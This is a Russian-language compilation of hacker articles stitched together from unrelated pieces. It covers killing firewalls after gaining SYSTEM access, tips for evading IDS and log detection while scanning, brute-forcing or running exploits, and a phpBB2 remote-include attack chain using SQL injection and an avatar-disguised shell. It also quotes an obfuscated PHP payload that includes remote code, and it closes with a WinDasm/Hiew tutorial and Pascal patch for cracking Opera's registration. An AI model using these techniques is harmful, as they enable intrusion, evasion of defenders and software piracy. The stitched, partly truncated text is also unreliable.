Теперь просто и незатейлево пытаемся изменить настройки\отключить\деинсталировать фаервол и посмотрим его реакцию. Предположим, мы удаленно получили доступ к командной строке с привелегиями SYSTEM или Администратора. Из-за криво настроенного фаервола мы имеем сам доступ, однако нам этого мало и надо любой ценой устранить сетевой экран.

*Касперский абсолютно не возражал против отключения своего сервиса и убийства процесса. У него даже защиты паролем нет.
*Аутпост был защищён паролем. Однако умер от простейшего тасккила с выгрузкой сервиса(можно сбацать сишную прогу с «TerminateProcess»)
*Аларм послал меня куда подальше, вывел табличку с предупреждением. Мало того, он защищен паролем и от деинсталяции. Безупречно. Отключив таки сервис, загрузившись в безопасносном режиме, я снова потерпел неудачу.
Оказывается, Аларм глубоко интегрируется в сетевые дровишки и при его несанкционированном отключении происходит полная блокировка сетевого трафика. Просто зверюга.

Кто здесь Лидер?

Ну вот. Чтож, могу сказать, что фаервол Касперского я бы назвал не Анти-Хакер, а Анти-Ламер ))) ибо защищает он лишь от них. Также использование его на системах, отличных от WinXP\SP2 будем иметь печальный итог. Тут уж я и не знаю кто кого и от кого защищает )).
Меня сильно позабавил смачный глюк, когда несмотря на «блокировку атакующего» я таки смог определить открытые порты. Ето вери-вери бэд.

Аутпост показал неплохую устойчивость от различного вида атак. Огорчает его безразличие к флуду (однако айпи хакера можно легко посмотреть, открыв вкладку сетевой активности), но радует повышенная безопасность от сниферства, spy-детектор и гибкость настроек детектора атак (да и всех остальных модулей — оч. профессиональный подход). Почти некчему придраться.

Зон Аларм ваще зверь, но только при высоком уровне защиты. Видите ли, разработчики делали режимы фаервола в расчете на СТРАШНЫЙ Интернет и БЕЗОПАСНУЮ локальную сеть… Поэтому, если вам все надоели, вы хакер, единоличник, или агент FBI — ставьте Алармик и врубайте высокий режим защиты. Тогда достучаться до вас можно будет только через дверь.

Для начала давайте рассмотрим сканнер безопасности XSpider. Безусловно, это лидер на рынке сканнеров безопасности. Но он создан именно для “открытого” сканирования. Самые первые следы могут быть найдены уже при начале сканирования – первым производится сканирование портов. Оно производится в большое количество потоков, поэтому легко обнаружается файрволом, соответственно администратор может с лёгкостью обнаружить в лог-файлах файрвола Ваш IP. Но это ещё пол беды. Максимум что Вам могут сделать за сканирование – предупредить, либо в будущем отфильтровывать все запросы с Вашего IP-адреса (бан по IP).

Идём дальше – XSpider, при обнаружения какой либо службы, в которой присутствует авторизация (Telnet, FTP, POP3 и т.д.), начинает подбирать к ней пароль, что тоже чревато последствиями. По большому счёту при подборе пароля есть 2 варианта развития событий:

1. Таймаут
2. Занесение попыток в логи

При первом варианте сервис обнаружает подбор пароля и на все, даже правильные, попытки авторизации начинает отказывать Вам в доступе. Соответственно администратору сообщается об этом.

При втором же варианте в логах появляется несколько сотен, а то и тысяч, строчек с попытками неверной авторизации, с промежутком в доли секунд, что явно указывает на подбор пароля. Это относится не только к XSpider, но и ко всем брутерам типа Brutus, Hydra и т.д..

Вот здесь есть лог ftp-сервера к которому я подбирал пароль с помощью Brutus-AET2. При подборе использовались словари которые идут в комплекте с Brutus-AET2. (users.txt,words.txt). Подбор только по этим словарям добавил в логи ровно 1000 строчек. Тот же XSpider имеет словари которые больше в тысячи раз.

Далее проходит анализ веб-контента и CGI-сканирование. Анализ веб-контента страшен тем, что сканнер начинает обнаружать уязвимостями самыми пресловутыми способами – подставляя в параметры кавычки, AND 1=1/*, всяческие теги в поля для ввода и т.д. Любая IDS сразу начнёт визжать и выдаст огромный список попыток атак. Конечно, Вы можете сказать – “там же есть галочка “Маскировать от IDS””. Хочу Вас огорчить – эта галочка практически ничего не значит, более-менее нормально настроенная IDS всё равно обнаружит попытки атак. К тому же, даже если IDS не имеется, Вы загадите логи так, что любой Вася из 9 класса, за шоколадку держащий сервер, обнаружит факт CGI-сканирования.

Для того, что бы больше Вас убедить я просканировал свой веб-сервер XSpider`ом используя профиль HTTPAll, предварительно вычистив у веб-сервера все логии полностью. После CGI-сканирования логи стали весить 642(!) кб. Лог заполненный результатами работы XSpider Вы так же можете посмотреть здесь.
Вот небольшой кусок из этого лога:

172.17.11.142 — - [21/Jan/2007:13:29:12 +0300] «GET /nkpyuetjqhiarwwk.htm HTTP/1.1″ 400
172.17.11.142 — - [21/Jan/2007:13:29:12 +0300] «GET / HTTP/1.1″ 302
172.17.11.142 — - [21/Jan/2007:13:29:12 +0300] «GET /https-admserv/bin/index HTTP/1.1″ 404
172.17.11.142 — - [21/Jan/2007:13:29:12 +0300] «GET /Admin.po?proceed=yes HTTP/1.1″ 404
172.17.11.142 — - [21/Jan/2007:13:29:13 +0300] «GET /Admin/index.jsp HTTP/1.1″ 200
172.17.11.142 — - [21/Jan/2007:13:29:13 +0300] «GET /std.html HTTP/1.1″ 404
172.17.11.142 — - [21/Jan/2007:13:29:13 +0300] «GET /servlet/ServletManager HTTP/1.1″ 404
172.17.11.142 — - [21/Jan/2007:13:29:13 +0300] «GET /admin/contextAdmin/contextList.jsp HTTP/1.1″ 200
172.17.11.142 — - [21/Jan/2007:13:29:14 +0300] «GET / HTTP/1.1″ 302
172.17.11.142 — - [21/Jan/2007:13:29:14 +0300] «PUT /PTNSSnnxam.txt HTTP/1.1″ 405

Как видите – первые 4 запроса сделаны в 13:29:12 – 100% cgi-сканирование.
Причём сканирование идёт со скоростью 4 запроса в секунду. На такую скорость сработает любая IDS. Ну и конечно же стоит упомянуть о том, что XSpider добавил своим сканированием 7068 строчек в лог-файл. Если Вы будете сканировать дохлый сайт какой ни будь компании, который посещают человека 2-3 в неделю (и то по ошибке), то Вы явно нарвётесь на неприятности. Самое лучшее, что можно сделать – сканировать/подбирать пароль через прокси. И то если Вы это сделаете, то будьте на 80% уверенны в том, что после Ваших действий Вас на той стороне уже будут ждать, а возможно и поменяют все пароли.
Далее по списку (если используется профиль Default) идёт поиск уязвимостей в остальных сервисах – удалённые переполнения буфера, DoS и т.д.. И мало кто из начинающих читает предупреждения или Help сканнера. Вот вырезка из справки XSpider – “Иногда, при плохом качестве связи с проверяемым хостом возможно ложное определение DoS-уязвимости (когда связь с хостом прервалась случайно, а XSpider сделал вывод, что прошла DoS-атака).” – отсюда делаем вывод — если DoS-атака пройдёт, то сервер реально может откинуться, но если верить той же справке, то такое происходит в 40% случаев. Обратите внимание ещё на то, что при настраивании профиля там ясно указывается — обнаружение некоторых уязвимостей может плохо кончится для сервера.
Ну, думаю что со сканнерами и с брутерами всё понятно. Давайте теперь перейдём к эксплойтам. Вы наверное ни раз уже пользовались ими. Но хоть один из Вас задумывался как они работают? Что они делают? Какие следы могут оставить? Я думаю что 70% читателей скажут “Нет”.
Большой популярностью (по мнению автора) пользуются эксплойты к форумам. Как Вы наверное уже знаете – на большинстве форумов распознавание пользователей происходит с помощью сессий. Имена сессий представляют из себя обычный набор букв и цифр – никаких посторонних или опасных знаков. Каждый кто заходит на форум получает сессию даже если он не авторизирован. Вот пример обычного имени сессии:
ab7bfc3f886270fd339dcce652fed1eb
А в эксплойте для ipb2.1.6 от RST как имя сессии передаётся строка ipb216_for_IDS. Так же, в каком-то эксплойте, (точно уже не помню) имя сессии было IDS_i_am_exploit. И таких примеров множество. Если Вы хотя бы немного знаете об IDS, то Вы наверное в курсе того что базы IDS часто обновляются, соответственно в них есть записи о том как распознать эксплоит.
Конечно же, IDS стоят не на всех веб-серверах, но это не спасёт Вас от вычисления в ~60% случаях использования эксплойтов. Возьмём, к примеру, эксплоит для IPB 2.1.5 от RST, который выполнял произвольные команды. Он создаёт топик называющийся justxpl, с примечанием justxpl justxpl. Топик содержит следующий текст:
r57ipbxplhohohoeval(include(chr(104).chr(116).chr(116). chr(112).chr(58).chr(47).chr(47).chr(114).chr(115).chr(116).chr(46).chr(118).chr(111).chr(105).chr(100). chr(46).chr(114).chr(117).chr(47).chr(114).chr(53) .chr(55).chr(105). chr(112).chr(98). chr(105).chr(110).chr(99). chr(46). chr(116).chr(120).chr(116)))

Грамотный администратор сразу же поймёт в чём дело, а Вы лишний раз засветитесь.
Вот вырезка из жалобы одного администратора провайдеру:
“попытки взлома форума продолжаются – на этой неделе опять были созданы темы «justxpl». Автор лазит через прокси.”
А эксплойты для удалённого переполнения буфера или повышения привилегий вообще не стоит использовать предварительно не проверив их работу хотя бы на виртуальной машине. Данные типы эксплойтов опасны тем, что могут делать далеко не то что обещают. В эксплойте может существовать и защита от дурака. Я слышал о множестве случаев когда запускали эксплоит, который (как в комментариях писалось) через уязвимость в определённом сервисе давал атакующему командную строку с привилегиями администратора, а получали полное вырубание сервиса или DoS всей машины.
Эксплойты для поднятия привилегий через уязвимость в ядре вообще могут грохнуть ОС так, что придётся переустанавливать. А подумайте сами – за что дадут больше сроку: за то что Вы просто получили командную строку или за то что Вы убили ядро ОС и вывели сервер из рабочего состояния?
Надеюсь после прочтения данной статьи многие задумаются и начнут перед атаками тестировать эксплойты на виртуальных машинах или локальном веб-сервере.

Поискав require и include во всех исходниках форума я нашел подключения различных файлов. Много подключений однотипных, например подключается файл так «$phpbb_root_path . ‘includes/functions_validate.’.$phpEx», т.е. указание на директорию, которая в зависимости от расположения подключающего файла меняется, затем точное указание на файл, добавление к нему расширения. Скорее всего $phpbb_root_path создана для удобной возможности перемещения файла из одного каталога в другой, и изменение этой переменной позволит легко переопределить пути подключения файла. Изменение этой переменной привело бы к возможности удаленного инклюда. $phpEx определяет расширение PHP скриптов, связано это с тем, что WWW сервис определяет PHP скрипт по его расширению. На некоторых серверах возможны такие варианты как «php3″,»php5″,»phtml».
Итак, что же сделано для того чтобы никто не смог переписать эти переменные? В файлах, где переменная «$phpbb_root_path»и «$phpEx» не задается явно, стоит проверка определена ли константа IN_PHPBB, если нет, то скрипт умирает сообщая «Hacking attempt». В файлах, где определяется эта константа, в самом начале определяются и эти две переменные $phpbb_root_path и $phpEx. Изменить эти переменные можно только если register_globals включен (по умолчанию он выключен), и программист забыл поставить проверку константы. Архитектурно неверно использовать подобные приемы, лучше всего жестко определять пути для подключаемых файлов, либо для определения пути использовать константы. Так же лучше всего определить фиксированное расширение для подключаемых файлов и выделить для них отдельный каталог, закрытый, например, с помощью .htaccess, от передачи оттуда файлов . Хотя такие решения с переменными дают возможность использовать данное приложение на различных WWW сервисах.
Из друг на друга похожих икнлюдов выделяются и интересуют нас следующие:

в файле admin/admin_styles.php
$phpbb_root_path. «templates/» . basename($install_to) . «/theme_info.cfg»
$phpbb_root_path. «templates/» . $sub_dir . «/theme_info.cfg»
в файле index.php
‘./’ . $file
в файле faq.php
$phpbb_root_path . ‘language/lang_’ . $board_config['default_lang'] . ‘/’
. $lang_file . ‘.’ . $phpEx

в файле includes/functions.php
function init_userprefs — $phpbb_root_path . ‘language/lang_’
. $board_config['default_lang'] . ‘/lang_main.’ . $phpEx
function init_userprefs — $phpbb_root_path . ‘language/lang_’
. $board_config['default_lang'] . ‘/lang_admin.’ . $phpEx
function setup_style — $phpbb_root_path . $template_path . $template_name
. ‘/’. $template_name . ‘.cfg’
function message_die — $phpbb_root_path . ‘language/lang_’
. $board_config['default_lang'] . ‘/lang_main.’.$phpEx

Файл admin/admin_styles.php
include($phpbb_root_path. «templates/» . basename($install_to)
. «/theme_info.cfg»);
Переменная install_to берется из запроса GET или POST в чистом виде, что может привести к передаче в эту переменную любой информации. Переменная обрабатывается функцией «basenamе()» и поэтому данные вида «/../../myScriptName» обрежутся до «myScriptName». Но можно передать строку «myScript\x0″ и тогда из папки templates подключится файл «myScript» , либо передать «..» и тогда если в корне форума существует theme_info.cfg, он подключится. Если его нет, то будет ошибка.
Стоит добавить проверки, которые поставлены в рассматриваемом далее инклюде, он так же находится в этом файле
. include($phpbb_root_path. «templates/» . $sub_dir
. «/theme_info.cfg»);
Расположенный вне проверок такой вызов функции позволил бы, передав в $sub_dir данные, запустить скрипт загруженный как аватар. В итоге полученная строка, переданная в include, выглядела бы так
./../templates/../images/avatars/shell.jpg\x0/theme_info.cfg
Но $sub_dir переменная, в которую поочередно передаются имена файлов и папок из каталога «./../templates/», значит возможность передать спецсимволы исключена.Дальше идет проверка того, что бы переменная не являлась файлом или ссылкой, не была бы равна «.», «..» и, как нестранно, «CVS». После такой проверки, $sub_dir однозначно будет каталогом. Последняя проверка устанавливает факт существования «theme_info.cfg». В итоге проникнуть можно либо создав свой каталог и поместив «theme_info.cfg», либо изменить существующий «theme_info.cfg».
В исходнике admin/index.php был найден такой инклюд «include(‘./’ . $file);». Выглядит инклюд очень заманчиво, но передать в него любые данные не получится, поскольку в $file, передаются имена файлов и каталогов из «admin/». А затем происходит проверка preg_match(«/^admin_.*?\.» . $phpEx . «$/», $file). Рассмотри алгоритм проверки: первым проверяется наличие в начале строки admin_, дальше может идти любое значение, заканчиваться строка должна .php. Действительно, «^» означает начало строки в которой осуществляется поиск и за началом следует «admin_», отсутсвие утверждения о начале, приведет к тому, что «admin_» сможет находится везде, что приведет к подключению файла с именем «mySTRING_admin_.php». «$» утверждает об окончании строки (или множества строк). На конце строки должен находится php. Без данного утверждения preg_match возвращал бы true даже в том случае, если имя файла было бы «admin_.php.mySTRING» . В принципе, существование директории «admin_.php» вызовет ошибку в работе скрипта. Можно было бы, добавить проверку на не директорию и не ссылку. Так как единственная возможность выполнить include с вредоносным кодом это записать этот файл в директорию «phpBB2/admin», то я думаю следует ограничить эту директорию правами только чтение и запуск.
Так же в «faq.php» замечен интересный инклюд
include($phpbb_root_path . ‘language/lang_’ . $board_config['default_lang']
. ‘/’ . $lang_file . ‘.’ . $phpEx);
$lang_file определятся однозначно либо как lang_bbcode, либо lang_faq . Остается переменная $board_config['default_lang']. Нужно проверить существует ли возможность ее перезаписи.
В common.php так определяется $board_config:
$sql = «SELECT *
FROM » . CONFIG_TABLE;
if( !($result = $db->sql_query($sql)) )
{
message_die(CRITICAL_ERROR, «Could not query config information»
, «», __LINE__, __FILE__, $sql);
}

while ( $row = $db->sql_fetchrow($result) )
{
$board_config[$row['config_name']] = $row['config_value'];
}
То есть, если существует возможность SQL инъекции, то нападающий сможет изменить значение в таблице, тем самым установив значение $board_config['default_lang'], например, на файл аватара. Скрипт faq.php обламывает такие попытки функцией init_userprefs (includes/functions.php). В этой фунции есть проверка basename’ом. В связи с тем, что basename отсечет все попытки прорваться в другие каталоги с помощью конструкций вида /../../, то можно указать на файл находящийся в language и начинающийся lang_ и заканчивающийся «\x0″.
Как говорилось выше в функции init_userprefs происходит вызов basename($board_config['default_lang']), затем полученный результат передается в $default_lang, проверяется наличие файла для инклюда, если файл не существует, то $default_lang становится равным «english». А перед вызовом include, $board_config['default_lang'] приравнивается $default_lang. В функции setup_style есть вот такое подключение файла
($phpbb_root_path . $template_path
. $template_name . ‘/’ . $template_name . ‘.cfg’)
«$template_path» определяется как ‘templates/’ и с этим ничего нельзя сделать, но остается «$template_name». В «$template_name» передаются данные из SQL запроса $row['template_name']. Значит при осуществлении SQL инъекции можно будет передать сюда все, что угодно. После инициализации переменной «$template_name» происходит вызов функции из класса Template, параметры, которые в неё передаются — ($phpbb_root_path . $template_path . $template_name). Затем проверяется значение, которое возвратила функция, а она возвращает ID объекта. И если посмотреть на функцию, то видно, что ей безразлично какие параметры передаются. А потому проверка расположенная перед инклюдом проходится спокойно. Создайте файл hack.php в папке includes и поместите туда такой код:

Видим, что оболочка, загруженная под видом аватара, запускается. Теперь найдем вызов функции «setup_style» в функции «init_userprefs», так как я использовал установленный без различных модификаций и стилей форум, то я перед вызовом setup_style($board_config['default_style']) ставлю echo $board_config['default_style']; и получаю 1. Просмотрев SQL запрос на получение данных составляем запрос, который должен быть осуществлен за счет SQL инъекции «UPDATE phpbb_themes SET template_name=/’../images/avatars/shell.jpg\x0′ WHERE themes_id = 1;
Инзменив таким образом $template_name мы получаем возможность загрузить вместо стиля по умолчанию наш скрипт, загруженный как аватар. Данная уязвимость работает (скорее всего) на всех версиях phpBB2 (я проверил на последней 2.0.21 и 2.0.10). Внеся такие изменения попробуйте теперь загрузить главную страницу и вы получите запуск «shell.jpg».

Осталась функция message_die
function message_die — $phpbb_root_path . ‘language/lang_’
. $board_config['default_lang'] . ‘/lang_main.’.$phpEx
Известно, что $board_config['default_lang'] в функции не изменяется, что можно переписать эту переменную SQL инъекцией. Задача найти вызов функции, где перед ее вызовом не объявляется константа HEADER_INC и первым параметром не передается CRITICAL_ERROR, а так же не вызывается перед message_die функция init_userprefs.
И это уже задача, твоя, читатель

Ломать будем в WinDasm v8.93, т.к. я считаю маловато про WinDasm в этих статьях сказано, а ведь
такая вещица классная, многие с нее начинали. Многого знать не надо ну кроме базисов, вроде основные в статье Dr.Golova описаны.

TOOLZ:
WinDasm 8.93, Hiew 6.11, Far (или NC), ну и самаOpera 3.61

Ну, вернемся к нашим бар.. Opera.

Заходим в браузер… Мда непорядок, первое, что бросается в глаза — это «unregistered» вверху экрана, да и еще, если успели заметить, при загрузке идет Registered to : unregistered. Вот и начнем отсюда. Выходим из проги, заходим в Far( NC или что там у вас), в директории Opera, копируем файл opera.exe в opera.xxx и opera.w32

*Я советую использовать именно эти расширения, т.к. они являются наиболее удобными, где *.xxx — backup; *.w32 — этот файл мы будем дизассемблировать; а в opera.exe будем с помощью HIEW вносить изменения. Т.е. если что-нибудь запорем, то дорога в «copy opera.xxx opera.exe» ;))

Так, выходим из Far по Alt+Tab, т.к. он нам еще пригодится. Заходим в WinDasm и дизассемблируем файл opera.w32………………….. ;)))))))))))))))

*Следующий шаг — это просмотр SDR (т.е. String Data Reference), в меню Refs — последний пункт.

Здесь то мы и должны найти наш «unregistered».

*Если прога объемная, как в этом случае с Оперой, то удобно будет скопировать все references кнопкой Copy All.

Ура нашли: String Resource ID=21428: » (unregistered)», чтобы попасть в это место достаточно дважды щелкнуть по строке.

*ОЧЕНЬ ВАЖНО! В проге может быть не одно это место, а несколько, так что щелкайте несколько раз, и смотрите на адреса.

Смотрим первое совпадение:

* Referenced by a (U)nconditional or (C)onditional Jump at Address: <- Первый переход |:0045F8EF(C) | :0045F91F 381D58F55200 cmp byte ptr [0052F558], bl :0045F925 7535 jne 0045F95C :0045F927 BE80000000 mov esi, 00000080 :0045F92C 56 push esi :0045F92D 57 push edi * Possible Reference to String Resource ID=20092: "Opera 3.61" | :0045F92E 687C4E0000 push 00004E7C :0045F933 8BCD mov ecx, ebp :0045F935 E8850D0000 call 004606BF :0045F93A 57 push edi :0045F93B E8E0A60800 call 004EA020 :0045F940 59 pop ecx :0045F941 2BF0 sub esi, eax :0045F943 A30CF55200 mov dword ptr [0052F50C], eax :0045F948 56 push esi :0045F949 8D8058F55200 lea eax, dword ptr [eax+0052F558] :0045F94F 50 push eax * Possible Reference to String Resource ID=21428: " (unregistered)" <---- Это наш "unregistered" | :0045F950 68B4530000 push 000053B4 :0045F955 8BCD mov ecx, ebp :0045F957 E8630D0000 call 004606BF ************ ТОЖЕ ВАЖНО! ************ Q: Почему в WinDasm все пишут основные строчки внизу, а не вверху, это неудобно! A: Т.к. Программа идет сверху вниз ;), а нам нужно посмотреть ЧТО вызвало этот "unregistered" Q: До какого момента мы смотрим вверх, где останавливаться??? A: Обычно в WinDasm идем вверх до первого jne/je ; jl/jbl; test; cmp ... или до Reference Jump. *************************************** На данном этапе необходимо остановиться и задуматься, а то ли это место, ведь посмотрите: есть и "unregistered", и "Opera 3.61", и переходов между ними нет, а может это всего лишь: "Opera 3.61 (unregistered)" в главном окне вверху... ИСТИННУ ГЛАГОЛИШЬ. Смотрим другой адрес (надеюсь, еще не забыли то правило, насчет нескольких мест): * Possible Reference to Dialog: SPLASH, CONTROL_ID:2B27, "Opera 3.60" <--- Странно, 3.60, что разработчики по этому поводу думают? | :00495F64 68272B0000 push 00002B27 :00495F69 FF7508 push [ebp+08] :00495F6C FFD6 call esi :00495F6E 8D8540FBFFFF lea eax, dword ptr [ebp+FFFFFB40] :00495F74 50 push eax * Possible Reference to Dialog: SPLASH, CONTROL_ID:2B25, " " | :00495F75 68252B0000 push 00002B25 :00495F7A FF7508 push [ebp+08] :00495F7D FFD6 call esi :00495F7F 8D856CFCFFFF lea eax, dword ptr [ebp+FFFFFC6C] :00495F85 50 push eax * Possible Reference to Dialog: SPLASH, CONTROL_ID:2B26, " " | :00495F86 68262B0000 push 00002B26 :00495F8B FF7508 push [ebp+08] :00495F8E FFD6 call esi :00495F90 393D64005300 cmp dword ptr [00530064], edi <---Сравнивание с edi :00495F96 752A jne 00495FC2 <--- "ПЕРвЫй переХод" :00495F98 68FF000000 push 000000FF :00495F9D 8D85C4FEFFFF lea eax, dword ptr [ebp+FFFFFEC4] :00495FA3 50 push eax * Possible Reference to String Resource ID=21428: " (unregistered)" <--- Вот ОН наш REAL unreg. | :00495FA4 68B4530000 push 000053B4 :00495FA9 FF3570FA5200 push dword ptr [0052FA70] :00495FAF FFD3 call ebx :00495FB1 8D85C5FEFFFF lea eax, dword ptr [ebp+FFFFFEC5] :00495FB7 50 push eax МДАСССССС, спокуха, это все фигня на самом деле. ТАК, как всегда, ловим первый попавшийся переход, вот и он: :00495F90 393D64005300 cmp dword ptr [00530064], edi :00495F96 752A jne 00495FC2 <--- "ПЕРвЫй переХод" *Je/Jne - Unconditional(jump if equal)/Conditional(jump if not equal); здесь важно понять эти действия: "Если [00530064] НЕРАВНО edi, то перейти на ПРАВИЛЬНУЮ РЕГИСТРАЦИЮ". (Действительно запутывающе). Смотрите, до него идет сравнивание значения в [00530064] с edi. Ну, поняли? Всего лишь осталось сделать так, чтобы в этом значении И БЫЛО ЭТО edi !!! Давайте снова остановимся и задумаемся, каким образом сравнивается значение из [00530064] с edi? Ведь для того, чтобы сравнить что-либо, нужно поместить туда что-нибудь, А КАК ПОМЕСТИТЬ? Чтобы найти, место, где помещается определенное значение в [00530064], сделаем так: в WinDasm жмем поиск и печатаем, почти ничего не изменяя: mov dword ptr [00530064] Согласитесь, логично, если там cmp, то здесь mov (*ЧИТАТЬ СТАТЬЮ Dr.Golova ОБ ОСНОВАХ АССЕМБЛЕРА !) И WinDasm найдет нам всего лишь одну (в случае с Оперой) ссылку, туда и пойдем: :00495E1F E8C3630200 call 004BC1E7 :00495E24 3BC7 cmp eax, edi :00495E26 A364005300 mov dword ptr [00530064], eax <--- То, что искали. ЧТО отсюда можно извлечь? Самое главное: все происходит в :00495E1F E8C3630200 call 004BC1E7 Идем в эту функцию: :004BC1E7 8D8138010000 lea eax, dword ptr [ecx+00000138] :004BC1ED 85C0 test eax, eax :004BC1EF 741A je 004BC20B <--- 1 Переход. :004BC1F1 803800 cmp byte ptr [eax], 00 :004BC1F4 7415 je 004BC20B <--- 2 Переход. :004BC1F6 81C190030000 add ecx, 00000390 :004BC1FC 51 push ecx :004BC1FD E8A647FDFF call 004909A8 :004BC202 85C0 test eax, eax :004BC204 59 pop ecx :004BC205 7404 je 004BC20B <--- 3 Переход. :004BC207 6A01 push 00000001 <--- Еденицу на стек. :004BC209 58 pop eax <--- Снимаем еденицу из стека в еах. :004BC20A C3 ret * Referenced by a (U)nconditional or (C)onditional Jump at Addresses: |:004BC1EF(C), :004BC1F4(C), :004BC205(C) | :004BC20B 33C0 xor eax, eax :004BC20D C3 ret Видим чудеса: 3 перехода на обнуление и выход да еще видим сравнение eax с 0 и снова выход, что же здесь думать-то, если после последнего перехода есть установка этой самой единицы!!! Нус, осталось всего-то с первого перехода прыгнуть на установку единицы! Теперь убеждаемся, что в WinDasm строка установлена на 4BC1EF (горит зеленым), потом на 4BC207 и смотрим внизу на смещение (Offset), это BC1EF и BC207. *Для использования в HIEW смещения (offsets) из WinDasm берем БЕЗ последней h (например "BC1EFh" из WinDasm) для использования в HIEW возьмем только "BC1EF". Переходим в Far Manager по Alt-Tab (remember the very begining?), и "hiew opera.exe", там переходим в F4 > Decode Mode, потом F5 > Search BC1EF и наконец редактируем: жмем F3 (Edit), потом F2 (Asm) и пишем: jmps BC207 (вместо je…), и наконец жмем F9 (Update), чтобы сохранить изменения.

(* Прим. Dr.Golova: Можно сделать иначе, поскольку HIEW умеет преводить виртуальные адреса из WinDasm в реальные файловые. Мы сразу наберем адрес 4BC1EF из WinDasm в окошке «GoTo» HIEW’a (те же самые F4 > DecodeMode > F5), только его надо дополнить точкой и нулями до вида «.004BC1EF». Попадем в то же самое место. Как проще — решать вам, но так по крайней мере не надо смотреть offset. *)

THAT’s All folks ;))))

Вот мой патч на ПАСКАЛЕ:
——————————cut———————————
program opera161_crack;
Const A: Array[1..2] of Record
A : Longint;
B : Byte;
End = ( (A : $BC1EF; B : $EB),
(A : $BC1F0; B : $16) );
Var Ch : Char;
I : Byte;
F : File;

Begin
Writeln(‘Kondor»s patch’, #10#13, ‘Crack for Opera v1.61′);
Assign(F, ‘OPERA.EXE’);
Reset(F, 1);

If IOResult <> 0 then
begin
Writeln(‘File not found!’);
Halt(1);
end;

For I := 1 to 2 do
Begin
Seek(F, A[I].A);
Ch := Char(A[I].B);
BlockWrite(F, Ch, 1);
End;

Writeln(#10#13, ‘File successfully patched!’);
End.